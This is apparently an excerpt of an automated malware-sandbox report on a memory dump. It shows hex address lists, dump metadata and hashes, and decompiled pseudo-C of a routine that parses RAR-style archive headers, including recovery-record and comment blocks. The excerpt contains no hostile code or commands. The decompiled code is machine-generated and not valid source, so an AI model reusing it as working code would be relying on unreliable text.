          0x0021d865
          0x0021d865
          0x0021d86b
          0x0021d86e
          0x0021d870
          0x0021d872
          0x0021d872
          0x0021d875
          0x0021d876
          0x0021d876
          0x0021d87b
          0x0021d87e
          0x0021d882
          0x0021d882
          0x0021d883
          0x0021d885
          0x0021d88b
          0x0021d891
          0x00000000
          0x00000000
          0x00000000
          0x0021d891
          0x0021d7c4
          0x0021d897
          0x0021d897
          0x00000000
          0x0021d897
          0x0021c61c
          0x0021c613
          0x0021c60a
          0x0021c5c1
          0x0021c5c5
          0x0021c5cd
          0x00000000
          0x0021c5cf
          0x0021c5d5
          0x0021c5da
          0x0021d8b6
          0x0021d8b6
          0x0021d8b9
          0x0021d8c4
          0x0021d8ef
          0x0021d8f0
          0x0021d8f1
          0x0021d8f2
          0x0021d8f3
          0x0021d8f4
          0x0021d8f9
          0x0021d901
          0x0021d906
          0x0021d90c
          0x0021d911
          0x0021d912
          0x0021d912
          0x0021d912
          0x0021d918
          0x0021d919
          0x0021d919
          0x0021d91c
          0x0021d922
          0x00000000
          0x00000000
          0x0021d924
          0x0021d929
          0x0021d92c
          0x0021d92e
          0x0021d936
          0x0021d938
          0x0021d93a
          0x0021d93f
          0x0021d942
          0x0021d948
          0x0021d94b
          0x0021d94d
          0x0021d94d
          0x0021d94d
          0x0021d94d
          0x0021d94b
          0x0021d950
          0x0021d95c
          0x0021d962
          0x0021d96a
          0x0021d96f
          0x0021d970
          0x0021d975
          0x0021d975
          0x0021d975
          0x0021d975
          0x0021d979
          0x0021d979
          0x0021d97c
          0x0021d983
          0x0021d990
          0x0021d8c6
          0x0021d8c6
          0x0021d8c6
          0x0021d8d0
          0x0021d8d9
          0x0021d8de
          0x0021d8ec
          0x0021d8ec
          0x0021d8c4
          0x0021c5cd

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: __floor_pentium4
          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
          • API String ID: 4168288129-2761157908
          • Opcode ID: eefb148c048d8d794e6ab77443821d363b92523d6ad424ff72d30ca529ba1fb7
          • Instruction ID: d495cd878789d8bd62251e35c2d67440e39e31c5a869a3fd455303e02e2837b3
          • Opcode Fuzzy Hash: eefb148c048d8d794e6ab77443821d363b92523d6ad424ff72d30ca529ba1fb7
          • Instruction Fuzzy Hash: C6C23971E246298FDB25CE289D407EAB7F9EB58304F2541EAD44DE7240E774AED18F40
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 93%
          			E001F2692(intOrPtr* __ecx, void* __eflags) {
          				void* __ebp;
          				unsigned int _t333;
          				signed int _t337;
          				char _t356;
          				signed short _t363;
          				signed int _t368;
          				signed int _t374;
          				signed char _t376;
          				signed char _t379;
          				char _t396;
          				signed int _t397;
          				signed int _t401;
          				signed char _t415;
          				intOrPtr _t416;
          				char _t417;
          				signed int _t420;
          				signed int _t421;
          				signed char _t426;
          				signed int _t429;
          				signed int _t433;
          				signed short _t438;
          				signed short _t443;
          				unsigned int _t448;
          				signed int _t451;
          				void* _t454;
          				signed int _t456;
          				signed int _t459;
          				void* _t466;
          				signed int _t472;
          				unsigned int _t476;
          				void* _t477;
          				void* _t484;
          				void* _t485;
          				signed char _t491;
          				signed int _t505;
          				intOrPtr* _t518;
          				signed int _t521;
          				signed int _t522;
          				intOrPtr* _t523;
          				signed int _t531;
          				signed int _t536;
          				signed int _t538;
          				unsigned int _t547;
          				signed int _t549;
          				signed int _t560;
          				signed char _t562;
          				signed int _t563;
          				void* _t586;
          				signed int _t590;
          				signed int _t602;
          				signed int _t604;
          				signed int _t606;
          				unsigned int _t612;
          				signed char _t628;
          				signed char _t638;
          				signed int _t641;
          				unsigned int _t642;
          				signed int _t645;
          				signed int _t646;
          				signed int _t648;
          				signed int _t649;
          				unsigned int _t651;
          				signed int _t655;
          				void* _t656;
          				void* _t663;
          				signed int _t666;
          				signed int _t667;
          				signed char _t668;
          				signed int _t671;
          				void* _t673;
          				signed int _t679;
          				signed int _t680;
          				void* _t685;
          				signed int _t686;
          				signed int _t687;
          				signed int _t694;
          				signed int _t695;
          				intOrPtr _t697;
          				void* _t698;
          				signed char _t707;
          
          				_t523 = __ecx;
          				E0020D870(E00221197, _t698);
          				E0020D940();
          				_t518 = _t523;
          				 *((intOrPtr*)(_t698 + 0x20)) = _t518;
          				E001FC223(_t698 + 0x24, _t518);
          				 *((intOrPtr*)(_t698 + 0x1c)) = 0;
          				 *((intOrPtr*)(_t698 - 4)) = 0;
          				_t655 = 7;
          				if( *(_t518 + 0x6cbc) == 0) {
          					L6:
          					 *((char*)(_t698 + 0x5f)) = 0;
          					L7:
          					E001FC42E(_t638, _t655);
          					if( *((intOrPtr*)(_t698 + 0x3c)) != 0) {
          						 *(_t518 + 0x21e4) = E001FC269(_t698 + 0x24) & 0x0000ffff;
          						 *(_t518 + 0x21f4) = 0;
          						_t679 = E001FC251(_t698 + 0x24) & 0x000000ff;
          						_t333 = E001FC269(_t698 + 0x24) & 0x0000ffff;
          						 *(_t518 + 0x21ec) = _t333;
          						 *(_t518 + 0x21f4) = _t333 >> 0x0000000e & 0x00000001;
          						_t531 = E001FC269(_t698 + 0x24) & 0x0000ffff;
          						 *(_t518 + 0x21f0) = _t531;
          						 *(_t518 + 0x21e8) = _t679;
          						__eflags = _t531 - _t655;
          						if(_t531 >= _t655) {
          							_t680 = _t679 - 0x73;
          							__eflags = _t680;
          							if(_t680 == 0) {
          								 *(_t518 + 0x21e8) = 1;
          							} else {
          								_t694 = _t680 - 1;
          								__eflags = _t694;
          								if(_t694 == 0) {
          									 *(_t518 + 0x21e8) = 2;
          								} else {
          									_t695 = _t694 - 6;
          									__eflags = _t695;
          									if(_t695 == 0) {
          										 *(_t518 + 0x21e8) = 3;
          									} else {
          										__eflags = _t695 == 1;
          										if(_t695 == 1) {
          											 *(_t518 + 0x21e8) = 5;
          										}
          									}
          								}
          							}
          							_t337 =  *(_t518 + 0x21e8);
          							 *(_t518 + 0x21dc) = _t337;
          							__eflags = _t337 - 0x75;
          							if(_t337 != 0x75) {
          								__eflags = _t337 - 1;
          								if(_t337 != 1) {
          									L23:
          									_push(_t531 - 7);
          									L24:
          									E001FC42E(_t638);
          									 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca0)) + E001F1901(_t518,  *(_t518 + 0x21f0));
          									_t536 =  *(_t518 + 0x21e8);
          									asm("adc eax, 0x0");
          									 *(_t518 + 0x6cac) =  *(_t518 + 0x6ca4);
          									 *(_t698 + 0x50) = _t536;
          									__eflags = _t536 - 1;
          									if(__eflags == 0) {
          										_t656 = _t518 + 0x2208;
          										E001FA96C(_t656);
          										_t538 = 5;
          										memcpy(_t656, _t518 + 0x21e4, _t538 << 2);
          										 *(_t518 + 0x221c) = E001FC269(_t698 + 0x24);
          										_t638 = E001FC29E(_t698 + 0x24);
          										 *(_t518 + 0x2220) = _t638;
          										 *(_t518 + 0x6cb5) =  *(_t518 + 0x2210) & 0x00000001;
          										 *(_t518 + 0x6cb4) =  *(_t518 + 0x2210) >> 0x00000003 & 0x00000001;
          										_t547 =  *(_t518 + 0x2210);
          										 *(_t518 + 0x6cb7) = _t547 >> 0x00000002 & 0x00000001;
          										 *(_t518 + 0x6cbb) = _t547 >> 0x00000006 & 0x00000001;
          										 *(_t518 + 0x6cbc) = _t547 >> 0x00000007 & 0x00000001;
          										__eflags = _t638;
          										if(_t638 != 0) {
          											L119:
          											_t356 = 1;
          											__eflags = 1;
          											L120:
          											 *((char*)(_t518 + 0x6cb8)) = _t356;
          											 *(_t518 + 0x2224) = _t547 >> 0x00000001 & 0x00000001;
          											_t549 = _t547 >> 0x00000004 & 0x00000001;
          											__eflags = _t549;
          											 *(_t518 + 0x6cb9) = _t547 >> 0x00000008 & 0x00000001;
          											 *(_t518 + 0x6cba) = _t549;
          											L121:
          											_t655 = 7;
          											L122:
          											_t363 = E001FC34F(_t698 + 0x24, 0);
          											__eflags =  *(_t518 + 0x21e4) - (_t363 & 0x0000ffff);
          											if( *(_t518 + 0x21e4) == (_t363 & 0x0000ffff)) {
          												L132:
          												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
          												goto L133;
          											}
          											_t368 =  *(_t518 + 0x21e8);
          											__eflags = _t368 - 0x79;
          											if(_t368 == 0x79) {
          												goto L132;
          											}
          											__eflags = _t368 - 0x76;
          											if(_t368 == 0x76) {
          												goto L132;
          											}
          											__eflags = _t368 - 5;
          											if(_t368 != 5) {
          												L130:
          												 *((char*)(_t518 + 0x6cc4)) = 1;
          												E001F6E03(0x2300e0, 3);
          												__eflags =  *((char*)(_t698 + 0x5f));
          												if(__eflags == 0) {
          													goto L132;
          												}
          												E001F6BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
          												 *((char*)(_t518 + 0x6cc5)) = 1;
          												goto L133;
          											}
          											__eflags =  *(_t518 + 0x45ae);
          											if( *(_t518 + 0x45ae) == 0) {
          												goto L130;
          											}
          											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
          											__eflags = _t374;
          											asm("sbb edx, ecx");
          											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
          											 *(_t698 + 0x5e) = 1;
          											do {
          												_t376 = E001F972B(_t518);
          												asm("sbb al, al");
          												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
          												 *(_t698 + 0x5e) = _t379;
          												_t655 = _t655 - 1;
          												__eflags = _t655;
          											} while (_t655 != 0);
          											__eflags = _t379;
          											if(_t379 != 0) {
          												goto L132;
          											}
          											goto L130;
          										}
          										_t356 = 0;
          										__eflags =  *(_t518 + 0x221c);
          										if( *(_t518 + 0x221c) == 0) {
          											goto L120;
          										}
          										goto L119;
          									}
          									if(__eflags <= 0) {
          										L115:
          										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
          										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
          											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E001FC29E(_t698 + 0x24);
          											asm("adc dword [ebx+0x6cac], 0x0");
          										}
          										goto L122;
          									}
          									__eflags = _t536 - 3;
          									if(_t536 <= 3) {
          										__eflags = _t536 - 2;
          										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
          										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
          										 *(_t698 + 0x48) = _t663;
          										E001FA8D2(_t663, 0);
          										_t560 = 5;
          										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
          										_t685 =  *(_t698 + 0x48);
          										_t666 =  *(_t698 + 0x50);
          										_t562 =  *(_t685 + 8);
          										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
          										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
          										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
          										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
          										__eflags = _t666 - 2;
          										if(_t666 != 2) {
          											L35:
          											_t641 = 0;
          											__eflags = 0;
          											_t396 = 0;
          											L36:
          											 *((char*)(_t685 + 0x10f0)) = _t396;
          											__eflags = _t666 - 2;
          											if(_t666 == 2) {
          												L39:
          												_t397 = _t641;
          												L40:
          												 *(_t685 + 0x10fa) = _t397;
          												_t563 = _t562 & 0x000000e0;
          												__eflags = _t563 - 0xe0;
          												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
          												__eflags = _t563 - 0xe0;
          												if(_t563 != 0xe0) {
          													_t642 =  *(_t685 + 8);
          													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
          													__eflags = 0x10000;
          												} else {
          													_t401 = _t641;
          													_t642 =  *(_t685 + 8);
          												}
          												 *(_t685 + 0x10f4) = _t401;
          												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
          												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
          												 *((intOrPtr*)(_t685 + 0x14)) = E001FC29E(_t698 + 0x24);
          												 *(_t698 + 0x54) = E001FC29E(_t698 + 0x24);
          												 *((char*)(_t685 + 0x18)) = E001FC251(_t698 + 0x24);
          												 *(_t685 + 0x1070) = 2;
          												 *((intOrPtr*)(_t685 + 0x1074)) = E001FC29E(_t698 + 0x24);
          												 *(_t698 + 0x18) = E001FC29E(_t698 + 0x24);
          												 *(_t685 + 0x1c) = E001FC251(_t698 + 0x24) & 0x000000ff;
          												 *((char*)(_t685 + 0x20)) = E001FC251(_t698 + 0x24) - 0x30;
          												 *(_t698 + 0x4c) = E001FC269(_t698 + 0x24) & 0x0000ffff;
          												_t415 = E001FC29E(_t698 + 0x24);
          												_t645 =  *(_t685 + 0x1c);
          												 *(_t698 + 0x58) = _t415;
          												 *(_t685 + 0x24) = _t415;
          												__eflags = _t645 - 0x14;
          												if(_t645 < 0x14) {
          													__eflags = _t415 & 0x00000010;
          													if((_t415 & 0x00000010) != 0) {
          														 *((char*)(_t685 + 0x10f1)) = 1;
          													}
          												}
          												 *(_t685 + 0x109c) = 0;
          												__eflags =  *(_t685 + 0x109b);
          												if( *(_t685 + 0x109b) == 0) {
          													L55:
          													_t416 =  *((intOrPtr*)(_t685 + 0x18));
          													 *(_t685 + 0x10fc) = 2;
          													__eflags = _t416 - 3;
          													if(_t416 == 3) {
          														L59:
          														 *(_t685 + 0x10fc) = 1;
          														L60:
          														 *(_t685 + 0x1100) = 0;
          														__eflags = _t416 - 3;
          														if(_t416 == 3) {
          															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
          															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
          																__eflags = 0;
          																 *(_t685 + 0x1100) = 1;
          																 *((short*)(_t685 + 0x1104)) = 0;
          															}
          														}
          														__eflags = _t666 - 2;
          														if(_t666 == 2) {
          															L66:
          															_t417 = 0;
          															goto L67;
          														} else {
          															__eflags =  *(_t685 + 0x24);
          															if( *(_t685 + 0x24) >= 0) {
          																goto L66;
          															}
          															_t417 = 1;
          															L67:
          															 *((char*)(_t685 + 0x10f8)) = _t417;
          															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
          															__eflags = _t420;
          															 *(_t685 + 0x10f9) = _t420;
          															if(_t420 == 0) {
          																__eflags =  *(_t698 + 0x54) - 0xffffffff;
          																_t638 = 0;
          																_t667 = 0;
          																_t137 =  *(_t698 + 0x54) == 0xffffffff;
          																__eflags = _t137;
          																_t421 = _t420 & 0xffffff00 | _t137;
          																L73:
          																 *(_t685 + 0x109a) = _t421;
          																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
          																asm("adc edi, ecx");
          																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
          																asm("adc edx, ecx");
          																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
          																__eflags =  *(_t685 + 0x109a);
          																 *(_t685 + 0x1064) = _t638;
          																if( *(_t685 + 0x109a) != 0) {
          																	 *(_t685 + 0x1060) = 0x7fffffff;
          																	 *(_t685 + 0x1064) = 0x7fffffff;
          																}
          																_t426 =  *(_t698 + 0x4c);
          																_t668 = 0x1fff;
          																 *(_t698 + 0x54) = 0x1fff;
          																__eflags = _t426 - 0x1fff;
          																if(_t426 < 0x1fff) {
          																	_t668 = _t426;
          																	 *(_t698 + 0x54) = _t426;
          																}
          																E001FC300(_t698 + 0x24, _t698 - 0x2030, _t668);
          																_t429 = 0;
          																__eflags =  *(_t698 + 0x50) - 2;
          																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
          																if( *(_t698 + 0x50) != 2) {
          																	 *(_t698 + 0x50) = _t685 + 0x28;
          																	_t432 = E00200FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
          																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
          																	__eflags =  *(_t685 + 8) & 0x00000400;
          																	if(( *(_t685 + 8) & 0x00000400) != 0) {
          																		_t671 = _t671 - 8;
          																		__eflags = _t671;
          																	}
          																	__eflags = _t671;
          																	if(_t671 <= 0) {
          																		_t672 = _t685 + 0x28;
          																	} else {
          																		 *(_t698 + 0x58) = _t685 + 0x1028;
          																		E001F1EDE(_t685 + 0x1028, _t671);
          																		_t466 = E001FC300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
          																		_t672 = _t685 + 0x28;
          																		_t432 = E00212B69(_t466, _t685 + 0x28, L"RR");
          																		__eflags = _t432;
          																		if(_t432 == 0) {
          																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
          																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
          																				_t673 =  *( *(_t698 + 0x58));
          																				asm("cdq");
          																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
          																				asm("cdq");
          																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
          																				asm("adc esi, edx");
          																				asm("cdq");
          																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
          																				asm("adc esi, edx");
          																				asm("cdq");
          																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
          																				asm("adc esi, edx");
          																				 *(_t518 + 0x21c0) = _t472 << 9;
          																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
          																				_t476 = E001FF749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
          																				 *(_t518 + 0x21c8) = _t476;
          																				 *(_t698 + 0x58) = _t476;
          																				_t477 = E0020D890(_t475, _t638, 0xc8, 0);
          																				asm("adc edx, [ebx+0x21c4]");
          																				_t432 = E001FF749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
          																				_t612 =  *(_t698 + 0x58);
          																				_t685 =  *(_t698 + 0x48);
          																				_t672 =  *(_t698 + 0x50);
          																				__eflags = _t432 - _t612;
          																				if(_t432 > _t612) {
          																					_t432 = _t612 + 1;
          																					 *(_t518 + 0x21c8) = _t612 + 1;
          																				}
          																			}
          																		}
          																	}
          																	_t433 = E00212B69(_t432, _t672, L"CMT");
          																	__eflags = _t433;
          																	if(_t433 == 0) {
          																		 *((char*)(_t518 + 0x6cb6)) = 1;
          																	}
          																} else {
          																	_t672 = _t685 + 0x28;
          																	 *_t672 = 0;
          																	__eflags =  *(_t685 + 8) & 0x00000200;
          																	if(( *(_t685 + 8) & 0x00000200) != 0) {
          																		E001F69E0(_t698);
          																		_t484 = E00212BB0(_t698 - 0x2030);
          																		_t638 =  *(_t698 + 0x54);
          																		_t485 = _t484 + 1;
          																		__eflags = _t638 - _t485;
          																		if(_t638 > _t485) {
          																			__eflags = _t485 + _t698 - 0x2030;
          																			E001F69F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
          																		}
          																		_t429 = 0;
          																		__eflags = 0;
          																	}
          																	__eflags =  *_t672 - _t429;
          																	if( *_t672 == _t429) {
          																		_push(1);
          																		_push(0x800);
          																		_push(_t672);
          																		_push(_t698 - 0x2030);
          																		E001FF79F();
          																	}
          																	E001F1F3D(_t518, _t685);
          																}
          																__eflags =  *(_t685 + 8) & 0x00000400;
          																if(( *(_t685 + 8) & 0x00000400) != 0) {
          																	E001FC300(_t698 + 0x24, _t685 + 0x10a1, 8);
          																}
          																E002008B2( *(_t698 + 0x18));
          																__eflags =  *(_t685 + 8) & 0x00001000;
          																if(( *(_t685 + 8) & 0x00001000) == 0) {
          																	L112:
          																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E001F3CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
          																	 *(_t518 + 0x6cac) = _t638;
          																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
          																	_t438 = E001FC34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
          																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
          																	if( *_t685 != (_t438 & 0x0000ffff)) {
          																		 *((char*)(_t518 + 0x6cc4)) = 1;
          																		E001F6E03(0x2300e0, 1);
          																		__eflags =  *((char*)(_t698 + 0x5f));
          																		if(__eflags == 0) {
          																			E001F6BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
          																		}
          																	}
          																	goto L121;
          																} else {
          																	_t443 = E001FC269(_t698 + 0x24);
          																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
          																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
          																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
          																	__eflags = 0;
          																	_t686 = 0;
          																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
          																	_t448 = _t443 & 0x0000ffff;
          																	 *(_t698 + 0x4c) = 0;
          																	 *(_t698 + 0x58) = _t448;
          																	do {
          																		_t586 = 3;
          																		_t521 = _t448 >> _t586 - _t686 << 2;
          																		__eflags = _t521 & 0x00000008;
          																		if((_t521 & 0x00000008) == 0) {
          																			goto L110;
          																		}
          																		__eflags =  *(_t698 + 4 + _t686 * 4);
          																		if( *(_t698 + 4 + _t686 * 4) == 0) {
          																			goto L110;
          																		}
          																		__eflags = _t686;
          																		if(__eflags != 0) {
          																			E002008B2(E001FC29E(_t698 + 0x24));
          																		}
          																		E002006E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
          																		__eflags = _t521 & 0x00000004;
          																		if((_t521 & 0x00000004) != 0) {
          																			_t249 = _t698 - 0x1c;
          																			 *_t249 =  *(_t698 - 0x1c) + 1;
          																			__eflags =  *_t249;
          																		}
          																		_t590 = 0;
          																		 *(_t698 - 0x18) = 0;
          																		_t522 = _t521 & 0x00000003;
          																		__eflags = _t522;
          																		if(_t522 <= 0) {
          																			L109:
          																			_t451 = _t590 * 0x64;
          																			__eflags = _t451;
          																			 *(_t698 - 0x18) = _t451;
          																			E00200910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
          																			_t448 =  *(_t698 + 0x58);
          																		} else {
          																			_t454 = 3;
          																			_t456 = _t454 - _t522 << 3;
          																			__eflags = _t456;
          																			 *(_t698 + 0x18) = _t456;
          																			_t687 = _t456;
          																			do {
          																				_t459 = (E001FC251(_t698 + 0x24) & 0x000000ff) << _t687;
          																				_t687 = _t687 + 8;
          																				_t590 =  *(_t698 - 0x18) | _t459;
          																				 *(_t698 - 0x18) = _t590;
          																				_t522 = _t522 - 1;
          																				__eflags = _t522;
          																			} while (_t522 != 0);
          																			_t686 =  *(_t698 + 0x4c);
          																			goto L109;
          																		}
          																		L110:
          																		_t686 = _t686 + 1;
          																		 *(_t698 + 0x4c) = _t686;
          																		__eflags = _t686 - 4;
          																	} while (_t686 < 4);
          																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
          																	_t685 =  *(_t698 + 0x48);
          																	goto L112;
          																}
          															}
          															_t667 = E001FC29E(_t698 + 0x24);
          															_t491 = E001FC29E(_t698 + 0x24);
          															__eflags =  *(_t698 + 0x54) - 0xffffffff;
          															_t638 = _t491;
          															if( *(_t698 + 0x54) != 0xffffffff) {
          																L71:
          																_t421 = 0;
          																goto L73;
          															}
          															__eflags = _t638 - 0xffffffff;
          															if(_t638 != 0xffffffff) {
          																goto L71;
          															}
          															_t421 = 1;
          															goto L73;
          														}
          													}
          													__eflags = _t416 - 5;
          													if(_t416 == 5) {
          														goto L59;
          													}
          													__eflags = _t416 - 6;
          													if(_t416 < 6) {
          														 *(_t685 + 0x10fc) = 0;
          													}
          													goto L60;
          												} else {
          													_t646 = _t645 - 0xd;
          													__eflags = _t646;
          													if(_t646 == 0) {
          														 *(_t685 + 0x109c) = 1;
          														goto L55;
          													}
          													_t648 = _t646;
          													__eflags = _t648;
          													if(_t648 == 0) {
          														 *(_t685 + 0x109c) = 2;
          														goto L55;
          													}
          													_t649 = _t648 - 5;
          													__eflags = _t649;
          													if(_t649 == 0) {
          														L52:
          														 *(_t685 + 0x109c) = 3;
          														goto L55;
          													}
          													__eflags = _t649 == 6;
          													if(_t649 == 6) {
          														goto L52;
          													}
          													 *(_t685 + 0x109c) = 4;
          													goto L55;
          												}
          											}
          											__eflags = _t562 & 0x00000010;
          											if((_t562 & 0x00000010) == 0) {
          												goto L39;
          											}
          											_t397 = 1;
          											goto L40;
          										}
          										__eflags = _t562 & 0x00000010;
          										if((_t562 & 0x00000010) == 0) {
          											goto L35;
          										} else {
          											_t396 = 1;
          											_t641 = 0;
          											goto L36;
          										}
          									}
          									__eflags = _t536 - 5;
          									if(_t536 != 5) {
          										goto L115;
          									} else {
          										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
          										_t651 =  *(_t518 + 0x4598);
          										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
          										_t628 = _t651 >> 0x00000001 & 0x00000001;
          										_t638 = _t651 >> 0x00000003 & 0x00000001;
          										 *(_t518 + 0x45ad) = _t628;
          										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
          										 *(_t518 + 0x45af) = _t638;
          										__eflags = _t628;
          										if(_t628 != 0) {
          											 *((intOrPtr*)(_t518 + 0x45a4)) = E001FC29E(_t698 + 0x24);
          										}
          										__eflags =  *(_t518 + 0x45af);
          										if( *(_t518 + 0x45af) != 0) {
          											_t505 = E001FC269(_t698 + 0x24) & 0x0000ffff;
          											 *(_t518 + 0x45a8) = _t505;
          											 *(_t518 + 0x6cd8) = _t505;
          										}
          										goto L121;
          									}
          								}
          								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
          								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
          									goto L20;
          								}
          								goto L23;
          							}
          							L20:
          							_push(6);
          							goto L24;
          						} else {
          							E001F1EF8(_t518);
          							L133:
          							E001F159C(_t698 + 0x24);
          							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
          							return  *((intOrPtr*)(_t698 + 0x1c));
          						}
          					}
          					L8:
          					E001F3DAB(_t518, _t638);
          					goto L133;
          				}
          				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
          				asm("adc eax, ecx");
          				_t707 =  *(_t518 + 0x6ca4);
          				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
          					goto L6;
          				} else {
          					 *((char*)(_t698 + 0x5f)) = 1;
          					E001F3C40(_t518);
          					_push(8);
          					_push(_t698 + 0x14);
          					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
          						goto L8;
          					} else {
          						_t697 = _t518 + 0x1024;
          						E001F607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
          						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
          						goto L7;
          					}
          				}
          			}

          APIs
          • __EH_prolog.LIBCMT ref: 001F269B
          • _strlen.LIBCMT ref: 001F2C1F
            • Part of subcall function 00200FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001FB312,00000000,?,?,?,000F004A), ref: 00200FFA
          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001F2D76
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
          • String ID: CMT
          • API String ID: 1706572503-2756464174
          • Opcode ID: 69652f0f2b199220b4aa2ab0b578b99d43bcd528e56d8843abedf45824482aa3
          • Instruction ID: 360a87def735f796c0b6a2b9605157416bda463ac30e729cb9d0feff62358a3d
          • Opcode Fuzzy Hash: 69652f0f2b199220b4aa2ab0b578b99d43bcd528e56d8843abedf45824482aa3
          • Instruction Fuzzy Hash: 3662E4716002488FDF18DF74C995AFA3BE1EF64304F09457EEE9A8B286DB709945CB60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 86%
          			E00217BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
          				char _v0;
          				signed int _v8;
          				intOrPtr _v524;
          				intOrPtr _v528;
          				void* _v532;
          				intOrPtr _v536;
          				char _v540;
          				intOrPtr _v544;
